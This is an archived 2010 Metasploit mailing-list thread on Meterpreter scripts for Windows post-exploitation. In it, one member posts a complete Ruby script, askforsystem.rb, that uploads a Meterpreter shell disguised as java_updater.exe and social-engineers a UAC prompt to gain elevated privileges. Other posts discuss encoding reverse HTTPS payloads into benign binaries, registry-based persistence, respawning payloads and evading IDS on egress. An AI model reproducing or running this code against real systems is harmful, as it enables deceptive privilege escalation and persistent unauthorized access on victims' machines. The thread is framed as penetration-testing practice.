metasploit-framework July 2010 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] uploadexec and kitrap0d

Re: [framework] uploadexec and kitrap0d

From: Carlos Perez <carlos_perez_at_nospam>
Date: Mon Jul 12 2010 - 18:18:49 GMT
To: Rob Fuller <mubix@room362.com>

Check the lib/scripts/meterpreter there is a mixing there with several new API calls and there is a check UAC one. I will write some documentation and post it today

Sent from my iPhone

On Jul 12, 2010, at 1:08 PM, Rob Fuller <mubix@room362.com> wrote:

> Thats a pretty pimp script. Carlos? Some of the UAC checks would also be handy in other scripts as well.
>
> Nice work Devin!
>
> --
> Rob Fuller | Mubix
> Room362.com | Hak5.org
>
>
> On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch@gmail.com> wrote:
>
> Kitrap0d never works in the wild, in my experience (too old now). If you're into social engineering and the rules of engagement permit it, I wrote a cheap hack called askforsystem.rb. Essentially, copies over a couple files from the "Elevate" Windows power tool, and a new shell. It then executes the new shell with high IL privileges (which prompts the user with UAC). I chose the name java_updater.exe for the new shell. It's cheap, but it works more often than not.
>
> To use, copy all the files from the elevate power tool to your msf data directory (extract the archive first):
> http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx
>
> Then copy a meterpreter shell executable named shell.exe into your msf data directory. The name is hard-coded right now. Sorry.
>
> Then save the following script to your meterpreter scripts directory as askforsystem.rb:
>
> ----- cut -----
> ######################################################
> # AskForSystem: Bypass UAC by, well, asking for it #
> ######################################################
> session = client
> host,port = session.tunnel_peer.split(':')
>
> def uaccheck(session)
> uac = false
> winversion = session.sys.config.sysinfo
> if winversion['OS']=~ /(Vista|7)/
> if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
> print_status("Checking if UAC is enabled ...")
> key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
> root_key, base_key = session.sys.registry.splitkey(key)
> value = "EnableLUA"
> open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
> v = open_key.query_value(value)
> if v.data == 1
> print_status("\tUAC is Enabled")
> uac = true
> else
> print_status("\tUAC is Disabled")
> end
> end
> end
> return uac
> end
>
> def upload(session,file,fileontrgt)
> location = session.fs.file.expand_path("%TEMP%")
> fileontrgt = "#{location}\\" + fileontrgt
> print_status("Uploading File #{file} ...")
> session.fs.file.upload_file("#{fileontrgt}","#{file}")
> print_status("Upload Complete ...")
> return fileontrgt
> end
>
> def execute_as_system(session,file)
> location = session.fs.file.expand_path("%TEMP%")
> print_status("Running Commands ...")
> session.sys.process.execute("cmd /c #{location}\\elevate #{location}\\#{file}", nil,{'Hidden' => true,'Channelized' => false})
> end
>
> if not uaccheck(session) then
> print_status("UAC isn't running, don't bother...")
> raise Rex::Script::Completed
> end
>
> elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd")
> elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs")
> shell = File.join(Msf::Config.install_root, "data", "shell.exe")
>
> upload(session,elevatecmd,"elevate.cmd")
> upload(session,elevatevbs,"elevate.vbs")
> upload(session,shell,"java_updater.exe")
>
> sleep 1
>
> print_status("Executing shell as system...")
> execute_as_system(session,"java_updater.exe")
> ----cut----
>
> My ruby sucks, but you get the idea. If someone wants to take the above script and add the appropriate railgun calls to ShellExecuteEx with the runas verb, be my guest. Also keep in mind that UAC isn't that big of an obstacle to Pen Testing... you can still read all of the users data. You can also still write to several directories in their profile (AppData is shown as the target above). You can also make meterpreter persistent by writing to the HKCU\software\microsoft\windows\currentversion\run key. But no hashes :(
>
> Invisible things lab blog has a great writeup of UAC here: http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html
> Especially relevant is the criticism that it doesn't protect any user data, it just prevents machines from being malware infested bots.
>
> Devin
>
>
>
>
> On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
> Just tried it. Working like a charm now. Uploaded and executed without a problem.
> I should be the one thanking you for sharing so much of your knowledge. Your scripts rock and I have learned tons from reading you over the years.
>
> I also noticed the kitrap0d script didn't work on the win 7 machine, probably all patched by now. I know that getprivs has gone through some changes so what's the best script to run right off the bat when you have meterpreter running as non-privileged user, before running scraper, hashdump and the like?
>
>
> cheers
> --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
>
> From: Carlos Perez <carlos_perez@darkoperator.com>
> Subject: Re: [framework] Meterpreter unexpectedly closes
> To: "Miguel Rios" <miguelrios35@yahoo.com>
> Cc: framework@spool.metasploit.com
> Date: Saturday, July 10, 2010, 1:45 PM
>
> svn up and give it a try now, it should be fixed. Thanks for reporting it
>
> On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:
>
>> Thanks Carlos.
>> Here's the output: running against a win 7 7600 build (english) machine.
>>
>> meterpreter > run uploadexec -e /root/notepad.exe
>> [*] Running Upload and Execute Meterpreter script....
>> [*] Uploading /root/notepad.exe....
>> [*] /root/notepad.exe uploaded!
>> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
>> [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
>> meterpreter > run uploadexec -e /root/notepad.exe -o /Q
>> [*] Running Upload and Execute Meterpreter script....
>> [*] Uploading /root/notepad.exe....
>> [*] /root/notepad.exe uploaded!
>> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
>> [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
>> meterpreter > run uploadexec -e /root/notepad.exe -v
>> [*] Running Upload and Execute Meterpreter script....
>> [*] Uploading /root/notepad.exe....
>> [*] /root/notepad.exe uploaded!
>> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
>> [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
>> meterpreter >
>>
>> --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
>>
>> From: Carlos Perez <carlos_perez@darkoperator.com>
>> Subject: Re: [framework] Meterpreter unexpectedly closes
>> To: "Miguel Rios" <miguelrios35@yahoo.com>
>> Cc: "Alex Polychronopoulos" <tweakier@gmail.com>, framework@spool.metasploit.com
>> Date: Saturday, July 10, 2010, 12:49 PM
>>
>> Miguel
>>
>> Do send me the output of what your getting and the command it self and I will take a look
>>
>> Cheers,
>> Carlos
>>
>> On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote
>>> Thanks. That explains it perfectly. For some reason I thought that meterpreter would continuously try to connect back. Now I know I was wrong. I had tried the loop option with VBS but the problem is that my custom script is designed to delete itself after running the meterpreter binary, so it obviously won't be there to respawn meterpreter. A bit of a catch 22.
>>>
>>> Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use the 'at' and 'schtasks' I believe) or have it auto run at startup through the registry and have a listener permanently set up on the internet listening and ready to run a bunch of scripts like scraper, etc (by the way, any literature out there on setting up just meterpreter listeners and scripts on a webserver or do I have to set up the full MSF on the server?).
>>>
>>> Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It wasn't a question of the exploited process dying since it's a standalone meterpreter binary I'm playing with.
>>>
>>> Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with reverse_tcp. That would be super stealth and highly effective at egressing the most restrictive networks.
>>>
>>> P.S. off topic here but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe binary to %temp% but it doesn't execute and the script spits out some error message about wrong count (4 of 1 or something like that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I just want my binary to be silently executed but I must be missing something stupidly obvious. Time to sleep maybe.
>>>
>>> --- On Sat, 7/10/10, Alex Polychronopoulos <tweakier@gmail.com> wrote:
>>>
>>> From: Alex Polychronopoulos <tweakier@gmail.com>
>>> Subject: Re: [framework] Meterpreter unexpectedly closes
>>> To: "Miguel Rios" <miguelrios35@yahoo.com>
>>> Cc: framework@spool.metasploit.com
>>> Date: Saturday, July 10, 2010, 8:28 AM
>>>
>>> Meterpreter is designed to not persistently trying to connect back to the handler, it tries once and then dies, so you're not doing something wrong. What you can do here is try the msfencode -t loop_vbs option which converts the payload into a vbscript and runs it every 5 seconds by default (you can change this by editing the generated .vbs file).
>>>
>>> On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
>>> Hi list,
>>> I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine when I test it in my XP SP3. I see the outbound connection and the process running, but after about a minute or so the process dies if there's no listener configured on the receiving end and doesn't respawn.
>>> What am I doing wrong here? I must be missing something obvious. Is there a timeout option for this reverse shell or a way to keep the process always running, even if it can't connect to the listener? Or is this due to msfencoding the payload somehow breaks it? I have tested that it does work properly when the listener is waiting for it, it's just the fact it timesout so quickly that is a pain.
>>>
>>> Also, saw the reverse_tcp allports payload and was wondering if there's a similar one for reverse meterpreter https. Ideally one could configure default ports to try 1st and then keep trying randomly the other 65000 or so to evade IDS. I know this would increase the payload size but it would be pretty stealth egress wise.
>>>
>>> Thanks. I do really love metasploit and the whole community behind it. You all rock.
>>>
>>> Miguel
>>>
>>>
>>> _______________________________________________
>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>
>>>
>>>
>>> _______________________________________________
>>> https://mail.metasploit.com/mailman/listinfo/framework
>>
>>
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework